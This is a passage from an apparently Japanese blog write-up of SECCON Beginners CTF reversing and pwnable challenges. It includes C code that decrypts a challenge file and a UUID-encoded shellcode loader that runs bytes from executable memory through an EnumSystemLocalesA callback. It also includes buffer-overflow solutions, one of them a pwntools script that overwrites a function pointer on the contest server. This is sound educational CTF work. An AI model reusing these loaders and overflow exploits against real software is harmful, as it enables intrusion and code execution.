\u3068\u7b49\u3057\u3044\u304b\u30c1\u30a7\u30c3\u30af<\/li>\n\n\n\n<li>\u7b49\u3057\u304f\u306a\u304b\u3063\u305f\u3089 <code>0<\/code> \u3092\u8fd4\u3059<\/li>\n\n\n\n<li>\u7b49\u3057\u3051\u308c\u3070\u6b21\u306b\u9032\u3080<\/li>\n<\/ol>\n\n\n\n<p>\u6700\u5f8c\u307e\u3067\u6765\u305f\u3089 <code>1<\/code> 
\u304c\u8fd4\u3055\u308c\u308b\u3002\u8981\u3059\u308b\u306b\u30e1\u30e2\u30ea\u306b\u3042\u308b\u6587\u5b57\u5217\u304c\u30d5\u30e9\u30b0\u304b\u3069\u3046\u304b\u30c1\u30a7\u30c3\u30af\u3057\u3066\u3044\u308b\u3002\u30d5\u30e9\u30b0\u3092\u69cb\u6210\u3059\u308b\u6587\u5b57\u306f\u4e0a\u8a18\u624b\u9806\u306e3.\u3067\u6bd4\u8f03\u3057\u3066\u3044\u308b\u5024\u3060\u304c\u3001\u30c1\u30a7\u30c3\u30af\u5bfe\u8c61\u306e\u30e1\u30e2\u30ea\u756a\u5730\u306f\u9806\u756a\u306b\u306a\u3063\u3066\u304a\u3089\u305a\u30d0\u30e9\u30d0\u30e9\u3067\u3042\u308b\u3002<\/p>\n\n\n\n<p>\u5168\u90e8\u306e\u30e1\u30e2\u30ea\u756a\u5730\u3092\u8a08\u7b97\u3057\u3066\u4e26\u3079\u66ff\u3048\u3066\u3084\u308c\u3070\u3044\u3044\u3060\u308d\u3046\u3002\u793e\u4f1a\u4eba\u306a\u306e\u3067\u5fc5\u9808\u30b9\u30ad\u30eb\u306eExcel\u3092\u4f7f\u3063\u3066\u8a08\u7b97\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-4.png\"><img loading=\"lazy\" decoding=\"async\" width=\"374\" height=\"678\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-4.png\" alt=\"\" class=\"wp-image-1206\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-4.png 374w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-4-165x300.png 165w\" sizes=\"auto, (max-width: 374px) 100vw, 374px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>\u3053\u308c\u3092\u30e1\u30e2\u30ea\u756a\u5730\u9806\u306b\u4e26\u3079\u66ff\u3048\u308b\u3068\u30d5\u30e9\u30b0\u304c\u5f97\u3089\u308c\u308b\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>FLAG: ctf4b{WAT_4n_345y_l0g1c!}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">reversing &#8211; MAFC<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow 
wp-block-quote-is-layout-flow\">\n<p>flag\u304c\u6b32\u3057\u3044\u304b\u3044\uff1f\u306a\u3089\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u3092\u89e3\u6790\u3057\u3066\u307f\u306a\u3002<br>Wanna get flag? if so, Reversing this Malware if you can<\/p>\n<\/blockquote>\n\n\n\n<p>\u4e0e\u3048\u3089\u308c\u305f\u30d5\u30a1\u30a4\u30eb\u306f <code>MalwareAnalysis-FirstChallenge.exe<\/code> \u3068 <code>flag.encrypted<\/code> \u306e2\u3064\u3002\u30d5\u30a1\u30a4\u30eb\u540d\u304b\u3089\u60f3\u50cf\u3059\u308b\u306b <code>MalwareAnalysis-FirstChallenge.exe<\/code> \u3067\u30d5\u30e9\u30b0\u30d5\u30a1\u30a4\u30eb\u3092\u6697\u53f7\u5316\u3055\u308c\u305f\u3082\u306e\u304c <code>flag.encrypted<\/code> \u3067\u3042\u308d\u3046\u3002\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb\u3092\u89e3\u6790\u3057\u3066\u30d5\u30e9\u30b0\u30d5\u30a1\u30a4\u30eb\u3092\u5fa9\u53f7\u3059\u308c\u3070\u3088\u3044\u3068\u601d\u308f\u308c\u308b\u3002<\/p>\n\n\n\n<p><code>MalwareAnalysis-FirstChallenge.exe<\/code> \u3092\u89e3\u6790\u3059\u308b\u3068\u975e\u5e38\u306b\u30b9\u30c8\u30ec\u30fc\u30c8\u306a\u3084\u308a\u65b9\u3067 <code>flag.txt<\/code> \u3092AES\u3067\u6697\u53f7\u5316\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308b\u306e\u3067\u3001\u9375\u3084IV\u306a\u3069\u306e\u30d1\u30e9\u30e1\u30fc\u30bf\u3092\u540c\u3058\u3082\u306e\u306b\u3057\u3066\u5fa9\u53f7\u3059\u308b\u30d7\u30ed\u30b0\u30e9\u30e0\u3092\u66f8\u3044\u3066\u3084\u308c\u3070\u3088\u3044\u3002<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include &lt;Windows.h&gt;\n#include &lt;wincrypt.h&gt;\n\nint main(int argc, char** argv) {\n\tHANDLE enc, plain;\n\tHCRYPTPROV hProv;\n\tHCRYPTHASH hHash;\n\tHCRYPTKEY hKey;\n\tchar keydata&#x5B;] = &quot;ThisIsTheEncryptKey&quot;;\n\tDWORD param = 1;\n\tDWORD filesize, numberofbytesread = 0;\n\tBOOL bRet;\n\tDWORD errcode;\n\n\tenc = CreateFileA(&quot;flag.encrypted&quot;, GENERIC_READ, 0, NULL, OPEN_EXISTING, 
FILE_ATTRIBUTE_NORMAL, NULL);\n\tplain = CreateFileA(&quot;flag.txt&quot;, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);\n\tbRet = CryptAcquireContextW(&amp;hProv, 0, L&quot;Microsoft Enhanced RSA and AES Cryptographic Provider&quot;, PROV_RSA_AES, 0);\n\tbRet = CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &amp;hHash);\n\tbRet = CryptHashData(hHash, (BYTE *)keydata, strlen(keydata), 0);\n\tbRet = CryptDeriveKey(hProv, CALG_AES_256, hHash, 0x1000000u, &amp;hKey);\n\tparam = PKCS5_PADDING;\n\tbRet = CryptSetKeyParam(hKey, KP_PADDING, (BYTE *)&amp;param, 0);\n\tbRet = CryptSetKeyParam(hKey, KP_IV, (BYTE *)L&quot;IVCanObfuscation&quot;, 0);\n\tparam = CRYPT_MODE_CBC;\n\tbRet = CryptSetKeyParam(hKey, KP_MODE, (BYTE *)&amp;param, 0);\n\n\tfilesize = GetFileSize(enc, 0);\n\tBYTE* filedata = (BYTE *)malloc(filesize);\n\tbRet = ReadFile(enc, filedata, filesize, &amp;numberofbytesread, 0);\n\tbRet = CryptDecrypt(hKey, 0, 1, 0, filedata, &amp;filesize);\n\tWriteFile(plain, filedata, filesize, &amp;numberofbytesread, 0);\n\n\treturn 0;\n}\n<\/pre><\/div>\n\n\n<p>\u3053\u308c\u3092\u5b9f\u884c\u3059\u308b\u3068\u5fa9\u53f7\u3055\u308c\u305f\u30d5\u30e9\u30b0\u304c <code>flag.txt<\/code> \u306b\u683c\u7d0d\u3055\u308c\u308b\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>FLAG: ctf4b{way_2_90!_y0u_suc3553d_2_ana1yz3_Ma1war3!!!} <\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">reversing &#8211; code_injection<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow 
wp-block-quote-is-layout-flow\">\n<p>\u3042\u308b\u6761\u4ef6\u306e\u3068\u304d\u306b\u30d5\u30e9\u30b0\u304c\u8868\u793a\u3055\u308c\u308b\u307f\u305f\u3044\u3002<\/p>\n<\/blockquote>\n\n\n\n<p>PowerShell\u306e\u30d5\u30a1\u30a4\u30eb\u3068\u30c6\u30ad\u30b9\u30c8\u30d5\u30a1\u30a4\u30eb\u304c\u4e0e\u3048\u3089\u308c\u308b\u3002\u30c6\u30ad\u30b9\u30c8\u30d5\u30a1\u30a4\u30eb\u306e\u65b9\u306b\u306fUUID\u304c31\u500b\u66f8\u304b\u308c\u3066\u3044\u308b\u3002PowerShell\u306e\u65b9\u3067\u306f\u305d\u308c\u3092UUID\u3068\u3057\u3066\u30ed\u30fc\u30c9\u3057\u3066\u30e1\u30e2\u30ea\u306b\u683c\u7d0d\u3057\u3001\u305d\u306e\u30e1\u30e2\u30ea\u9818\u57df\u306e\u30a2\u30c9\u30ec\u30b9\u3092 <code>EnumSystemLocalesA<\/code> \u95a2\u6570\u306e\u30d1\u30e9\u30e1\u30fc\u30bf\u3068\u3057\u3066\u4e0e\u3048\u3066\u3044\u308b\u3002<\/p>\n\n\n\n<p>UUID\u3068\u3044\u3046\u306e\u306f128bit\u306e\u30c7\u30fc\u30bf\u3067\u3042\u308b\u305f\u3081\u3001\u5185\u90e8\u7684\u306b\u306f16\u30d0\u30a4\u30c8\u306e\u30c7\u30fc\u30bf\u306b\u306a\u308b\u3002\u3053\u306e\u305f\u3081\u3001UUID\u30c7\u30fc\u30bf\u3092\u683c\u7d0d\u3057\u305f\u9818\u57df\u306f16*31\u30d0\u30a4\u30c8\u306e\u9818\u57df\u3068\u306a\u308b\u3002<\/p>\n\n\n\n<p><code>EnumSystemLocalesA<\/code> \u95a2\u6570\u306e\u7b2c\u4e00\u30d1\u30e9\u30e1\u30fc\u30bf\u306b\u6e21\u3055\u308c\u305f\u30a2\u30c9\u30ec\u30b9\u306f\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u95a2\u6570\u3068\u3057\u3066\u6271\u308f\u308c\u308b\u3002\u3059\u306a\u308f\u3061\u3001UUID 
31\u500b\u306e\u30c7\u30fc\u30bf\u3092\u683c\u7d0d\u3057\u305f\u30e1\u30e2\u30ea\u9818\u57df\u306e\u4e2d\u8eab\u306f\u95a2\u6570\u3068\u3057\u3066\u89e3\u91c8\u3067\u304d\u308b\u3068\u3044\u3046\u3053\u3068\u306b\u306a\u308b\u3002<\/p>\n\n\n\n<p>\u3067\u306f\u305d\u306e\u95a2\u6570\u3092\u89e3\u6790\u3057\u3088\u3046\u3002PowerShell\u30d5\u30a1\u30a4\u30eb\u3068\u540c\u3058\u51e6\u7406\u3092\u3059\u308b\u30d7\u30ed\u30b0\u30e9\u30e0\u3092\u4f5c\u6210\u3057\u3001IDA\u3067\u30c7\u30d0\u30c3\u30b0\u3057\u3066 <code>EnumSystemLocalesA<\/code> \u95a2\u6570\u306e\u5b9f\u884c\u76f4\u524d\u3067\u6b62\u3081\u308b\u3002<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include &lt;windows.h&gt;\n#include &lt;rpc.h&gt;\n\n#pragma comment(lib, &quot;Rpcrt4.lib&quot;)\n\nint main(int argc, char** argv) {\n\tUUID uuid&#x5B;31];\n\tBYTE* data = (BYTE *)&amp;uuid;\n    DWORD numberofbyteswritten = 0;\n\n    UuidFromStringA((RPC_CSTR)&quot;56525153-4157-4150-5155-4889e54883e4&quot;, &amp;uuid&#x5B;0]);\n    UuidFromStringA((RPC_CSTR)&quot;ec8348f0-6530-8b48-0425-60000000488b&quot;, &amp;uuid&#x5B;1]);\n    UuidFromStringA((RPC_CSTR)&quot;8b482040-80b0-0000-0083-3e000f84a701&quot;, &amp;uuid&#x5B;2]);\n    UuidFromStringA((RPC_CSTR)&quot;3e810000-0043-0054-7526-817e04460034&quot;, &amp;uuid&#x5B;3]);\n    UuidFromStringA((RPC_CSTR)&quot;811d7500-087e-0042-3d00-7514837e0c31&quot;, &amp;uuid&#x5B;4]);\n    UuidFromStringA((RPC_CSTR)&quot;8b480e75-481e-e3c1-0848-895c2420eb06&quot;, &amp;uuid&#x5B;5]);\n    UuidFromStringA((RPC_CSTR)&quot;02c68348-c3eb-4865-8b04-256000000048&quot;, &amp;uuid&#x5B;6]);\n    UuidFromStringA((RPC_CSTR)&quot;4818408b-408b-4820-8b00-488b7850488b&quot;, &amp;uuid&#x5B;7]);\n    UuidFromStringA((RPC_CSTR)&quot;20b9481f-2000-2000-0020-004809cb48c1&quot;, &amp;uuid&#x5B;8]);\n    UuidFromStringA((RPC_CSTR)&quot;334808e3-245c-4820-8b00-488b78504803&quot;, &amp;uuid&#x5B;9]);\n    
UuidFromStringA((RPC_CSTR)&quot;20b9481f-2000-2000-0020-004809cb4889&quot;, &amp;uuid&#x5B;10]);\n    UuidFromStringA((RPC_CSTR)&quot;4820245c-588b-8b20-433c-4801d88bb888&quot;, &amp;uuid&#x5B;11]);\n    UuidFromStringA((RPC_CSTR)&quot;48000000-df01-778b-2048-01de48ba0540&quot;, &amp;uuid&#x5B;12]);\n    UuidFromStringA((RPC_CSTR)&quot;7d454e56-2a08-8948-5424-104831c98b14&quot;, &amp;uuid&#x5B;13]);\n    UuidFromStringA((RPC_CSTR)&quot;da01488e-3a81-6547-7453-7514817a0474&quot;, &amp;uuid&#x5B;14]);\n    UuidFromStringA((RPC_CSTR)&quot;75614864-810b-087a-6e64-6c657502eb05&quot;, &amp;uuid&#x5B;15]);\n    UuidFromStringA((RPC_CSTR)&quot;ebc1ff48-8bd9-2477-4801-de668b0c4e8b&quot;, &amp;uuid&#x5B;16]);\n    UuidFromStringA((RPC_CSTR)&quot;01481c77-8bde-8e04-4801-d848ba5b403a&quot;, &amp;uuid&#x5B;17]);\n    UuidFromStringA((RPC_CSTR)&quot;13404150-4852-5489-2418-b9f5ffffffff&quot;, &amp;uuid&#x5B;18]);\n    UuidFromStringA((RPC_CSTR)&quot;c08949d0-ba48-5908-0314-1059096b4889&quot;, &amp;uuid&#x5B;19]);\n    UuidFromStringA((RPC_CSTR)&quot;778b2414-4820-de01-4831-c98b148e4801&quot;, &amp;uuid&#x5B;20]);\n    UuidFromStringA((RPC_CSTR)&quot;573a81da-6972-7574-1481-7a0465436f6e&quot;, &amp;uuid&#x5B;21]);\n    UuidFromStringA((RPC_CSTR)&quot;7a810b75-7308-6c6f-6575-02eb0548ffc1&quot;, &amp;uuid&#x5B;22]);\n    UuidFromStringA((RPC_CSTR)&quot;778bd9eb-4824-de01-668b-0c4e48ba1f72&quot;, &amp;uuid&#x5B;23]);\n    UuidFromStringA((RPC_CSTR)&quot;13044e56-681c-8948-5424-088b771c4801&quot;, &amp;uuid&#x5B;24]);\n    UuidFromStringA((RPC_CSTR)&quot;8e048bde-0148-48d8-83ec-30488d542430&quot;, &amp;uuid&#x5B;25]);\n    UuidFromStringA((RPC_CSTR)&quot;48c93148-f983-7404-124c-8b4c24504c33&quot;, &amp;uuid&#x5B;26]);\n    UuidFromStringA((RPC_CSTR)&quot;894cca0c-ca0c-ff48-c1eb-e84c89c149c7&quot;, &amp;uuid&#x5B;27]);\n    UuidFromStringA((RPC_CSTR)&quot;000020c0-4d00-c931-48c7-442420000000&quot;, &amp;uuid&#x5B;28]);\n    
UuidFromStringA((RPC_CSTR)&quot;48d0ff00-c483-eb30-0048-31c04889ec5d&quot;, &amp;uuid&#x5B;29]);\n    UuidFromStringA((RPC_CSTR)&quot;58415941-5e5f-595a-5bc3-000000000000&quot;, &amp;uuid&#x5B;30]);\n\n    BYTE* buf = (BYTE*)VirtualAlloc(NULL, 16 * 31, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n    HANDLE hFile = CreateFileA(&quot;output.dat&quot;, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);\n    for (int i = 0; i &lt; 31; i++) {\n        CopyMemory(buf + i * 16, &amp;uuid&#x5B;i], 16);\n        WriteFile(hFile, &amp;uuid&#x5B;i], 16, &amp;numberofbyteswritten, 0);\n    }\n    CloseHandle(hFile);\n\n    EnumSystemLocalesA((LOCALE_ENUMPROCA)buf, 0);\n\n    return 0;\n}\n<\/pre><\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-5.png\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"509\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-5-1024x509.png\" alt=\"\" class=\"wp-image-1207\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-5-1024x509.png 1024w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-5-300x149.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-5-768x382.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-5-624x310.png 624w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-5.png 1192w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>\u305d\u306e\u72b6\u614b\u3067 <code>buf<\/code> \u306e\u6307\u3059\u30a2\u30c9\u30ec\u30b9\u3078\u884c\u304d\u30c7\u30fc\u30bf\u3092\u30b3\u30fc\u30c9\u3068\u3057\u3066\u89e3\u91c8\u3055\u305b\u308b\u3068\u3044\u3044\u611f\u3058\u306b\u95a2\u6570\u306b\u3067\u304d\u308b\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-6.png\"><img 
loading=\"lazy\" decoding=\"async\" width=\"857\" height=\"766\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-6.png\" alt=\"\" class=\"wp-image-1208\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-6.png 857w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-6-300x268.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-6-768x686.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-6-624x558.png 624w\" sizes=\"auto, (max-width: 857px) 100vw, 857px\" \/><\/a><\/figure>\n\n\n\n<p>\u30a2\u30bb\u30f3\u30d6\u30ea\u30b3\u30fc\u30c9\u3092ChatGPT\u306b\u6e21\u3057\u3066\u89e3\u8aac\u3055\u305b\u305f\u3089\u3044\u3044\u611f\u3058\u306b\u51fa\u3057\u3066\u304f\u308c\u305f\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-7.png\"><img loading=\"lazy\" decoding=\"async\" width=\"802\" height=\"435\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-7.png\" alt=\"\" class=\"wp-image-1209\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-7.png 802w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-7-300x163.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-7-768x417.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-7-624x338.png 624w\" sizes=\"auto, (max-width: 802px) 100vw, 802px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p><code>gs:60h<\/code> \u306fPEB\u3060\u304c <code>+20h<\/code> \u304c\u4f55\u304b\u3001\u305d\u306e\u5148\u306e <code>+80h<\/code> \u304c\u4f55\u304b\u3068\u3044\u3063\u305f\u60c5\u5831\u304c\u8db3\u308a\u306a\u304b\u3063\u305f\u306e\u3067\u8ffd\u52a0\u3067PEB\u306e\u69cb\u9020\u306a\u3069\u3092\u805e\u3044\u3066\u78ba\u8a8d\u3002x64\u306ePEB\u3067\u306f <code>+20h<\/code> \u304c <code>ProcessParameters<\/code>\u3001\u305d\u306e\u5148\u306e <code>+80h<\/code> \u304c\u74b0\u5883\u5909\u6570\u30d6\u30ed\u30c3\u30af\u3092\u6307\u3059 <code>Environment<\/code> \u306b\u3042\u305f\u308b\u3002\u7dcf\u5408\u3059\u308b\u3068\u524d\u534a\u3067\u306f\u74b0\u5883\u5909\u6570\u306b <code>CTF4B=1<\/code> 
\u3068\u3044\u3046\u6587\u5b57\u5217\u304c\u3042\u308b\u304b\u3069\u3046\u304b\u3092\u30c1\u30a7\u30c3\u30af\u3057\u3001\u306a\u304b\u3063\u305f\u3089\u51e6\u7406\u3092\u7d42\u4e86\u3057\u3066\u3044\u308b\u3002<\/p>\n\n\n\n<p>\u74b0\u5883\u5909\u6570\u306b <code>CTF4B=1<\/code> \u3092\u8ffd\u52a0\u3057\u3066\u30d7\u30ed\u30b0\u30e9\u30e0\u3092\u5b9f\u884c\u3059\u308b\u3068\u3001\u30b3\u30f3\u30bd\u30fc\u30eb\u306b\u30d5\u30e9\u30b0\u304c\u51fa\u529b\u3055\u308c\u305f\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-8.png\"><img loading=\"lazy\" decoding=\"async\" width=\"613\" height=\"122\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-8.png\" alt=\"\" class=\"wp-image-1211\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-8.png 613w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-8-300x60.png 300w\" sizes=\"auto, (max-width: 613px) 100vw, 613px\" \/><\/a><\/figure>\n<\/div>\n\n\n<pre class=\"wp-block-code\"><code>FLAG: ctf4b{g3t_3nv1r0nm3n7_fr0m_p3b}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwnable &#8211; pet_name<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u30da\u30c3\u30c8\u306b\u540d\u524d\u3092\u4ed8\u3051\u307e\u3057\u3087\u3046\u3002\u3061\u306a\u307f\u306b\u30d5\u30e9\u30b0\u306f\/home\/pwn\/flag.txt\u306b\u66f8\u3044\u3066\u3042\u308b\u307f\u305f\u3044\u3067\u3059\u3002<\/p>\n\n\n\n<p><code>nc pet-name.challenges.beginners.seccon.jp 9080<\/code><\/p>\n<\/blockquote>\n\n\n\n<p>\u4e0e\u3048\u3089\u308c\u305f\u30bd\u30fc\u30b9\u30b3\u30fc\u30c9\u3092\u898b\u308b\u3068\u30da\u30c3\u30c8\u540d\u3092\u5165\u308c\u308b\u30d0\u30c3\u30d5\u30a1\u306f32\u30d0\u30a4\u30c8\u3042\u308b\u304c\u3001<code>scanf<\/code> 
\u3067\u9577\u3055\u3092\u30d0\u30c3\u30d5\u30a1\u30b5\u30a4\u30ba\u306b\u5236\u9650\u305b\u305a\u306b\u5165\u529b\u3057\u3066\u3044\u308b\u305f\u308132\u30d0\u30a4\u30c8\u3092\u8d85\u3048\u3066\u8aad\u307f\u8fbc\u3081\u308b\u300232\u30d0\u30a4\u30c8\u3092\u8d85\u3048\u305f\u5206\u306f <code>path<\/code> \u5909\u6570\u3092\u4e0a\u66f8\u304d\u3059\u308b\u3053\u3068\u306b\u306a\u308b\u3002\u5bfe\u7b56\u306f\u3001\u66f8\u5f0f\u306b\u6700\u5927\u30d5\u30a3\u30fc\u30eb\u30c9\u5e45\u3092\u6307\u5b9a\u3057\u3066\u30d0\u30c3\u30d5\u30a1\u306b\u53ce\u307e\u308b\u9577\u3055\u3060\u3051\u3092\u8aad\u307f\u8fbc\u3080\u3053\u3068\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-17.png\"><img loading=\"lazy\" decoding=\"async\" width=\"397\" height=\"102\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-17.png\" alt=\"\" class=\"wp-image-1222\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-17.png 397w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-17-300x77.png 300w\" sizes=\"auto, (max-width: 397px) 100vw, 397px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>\u5f8c\u7d9a\u306e\u51e6\u7406\u3067 <code>path<\/code> \u5909\u6570\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u958b\u3044\u3066\u5185\u5bb9\u3092\u51fa\u529b\u3057\u3066\u3044\u308b\u305f\u3081\u3001<code>path<\/code> \u5909\u6570\u306b\u30d5\u30e9\u30b0\u30d5\u30a1\u30a4\u30eb\u306e\u30d1\u30b9\u3092\u5165\u308c\u308c\u3070\u30d5\u30e9\u30b0\u3092\u53d6\u5f97\u3067\u304d\u308b\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-18.png\"><img loading=\"lazy\" decoding=\"async\" width=\"848\" height=\"73\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-18.png\" alt=\"\" class=\"wp-image-1223\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-18.png 848w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-18-300x26.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-18-768x66.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-18-624x54.png 624w\" sizes=\"auto, (max-width: 848px) 100vw, 848px\" 
\/><\/a><\/figure>\n<\/div>\n\n\n<pre class=\"wp-block-code\"><code>Flag: ctf4b{3xp1oit_pet_n4me!}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwnable &#8211; pet_sound<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u30da\u30c3\u30c8\u306b\u9cf4\u304d\u58f0\u3092\u6559\u3048\u307e\u3057\u3087\u3046\u3002<\/p>\n\n\n\n<p><code>nc pet-sound.challenges.beginners.seccon.jp 9090<\/code><\/p>\n<\/blockquote>\n\n\n\n<p><code>nc<\/code> \u3067\u7e4b\u3050\u3068\u30e1\u30e2\u30ea\u30ec\u30a4\u30a2\u30a6\u30c8\u3092\u8868\u793a\u3057\u3066\u304f\u308c\u3066\u3055\u3089\u306b\u66f8\u304d\u63db\u3048\u5bfe\u8c61\u3082 &#8220;TARGET!&#8221; \u3068\u6307\u5b9a\u3057\u3066\u304f\u308c\u3066\u3044\u308b\u3002\u89aa\u5207\u3002\u30e6\u30fc\u30b6\u306e\u5165\u529b\u306f <code>pet_A->sound<\/code> \u306e\u305f\u3081\u3001<code>pet_A->speak<\/code> \u306e\u66f8\u304d\u63db\u3048\u306f\u3067\u304d\u306a\u3044\u3002\u6307\u5b9a\u3055\u308c\u3066\u3044\u308b\u901a\u308a <code>pet_B->speak<\/code> \u306e\u3068\u3053\u308d\u3092 <code>speak_flag<\/code> \u306b\u66f8\u304d\u63db\u3048\u3066\u3084\u308c\u3070\u3044\u3044\u3002<code>nc<\/code> \u3067\u30a4\u30f3\u30bf\u30e9\u30af\u30c6\u30a3\u30d6\u306b\u3084\u3063\u3066\u3044\u308b\u3068\u3053\u308d\u3067\u306f\u975eASCII\u6587\u5b57\u3092\u5165\u529b\u3067\u304d\u306a\u3044\u305f\u3081\u3001Python\u30b3\u30fc\u30c9\u3092\u66f8\u3044\u305f\u3002\u3082\u3057 <code>nc<\/code> \u4f7f\u3063\u3066\u89e3\u304f\u65b9\u6cd5\u304c\u3042\u308c\u3070\u6559\u3048\u3066\u307b\u3057\u3044\u3002<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\nfrom pwn import *\n\nconn = remote(&quot;pet-sound.challenges.beginners.seccon.jp&quot;, 9090)\nwhile True:\n    try:\n        line = conn.recvline()\n    except EOFError:\n        break\n\n    print(line.decode(errors = &#039;ignore&#039;), end = &#039;&#039;)\n\n    if 
b&quot;&#x5B;hint]&quot; in line:\n        speak_flag_addr_str = line.split(b&quot;0x&quot;)&#x5B;1]\n        speak_flag_addr = unhex(speak_flag_addr_str)&#x5B;::-1]\n        break\n\nsenddata = b&quot;A&quot; * 40 + speak_flag_addr\nconn.send(senddata)\n\nwhile True:\n    try:\n        line = conn.recvline()\n    except EOFError:\n        break\n    print(line.decode(errors = &#039;ignore&#039;), end = &#039;&#039;)\n<\/pre><\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-19.png\"><img loading=\"lazy\" decoding=\"async\" width=\"690\" height=\"902\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-19.png\" alt=\"\" class=\"wp-image-1225\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-19.png 690w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-19-229x300.png 229w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-19-624x816.png 624w\" sizes=\"auto, (max-width: 690px) 100vw, 690px\" \/><\/a><\/figure>\n<\/div>\n\n\n<pre class=\"wp-block-code\"><code>Flag: ctf4b{y0u_expl0it_0v3rfl0w!}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwnable &#8211; 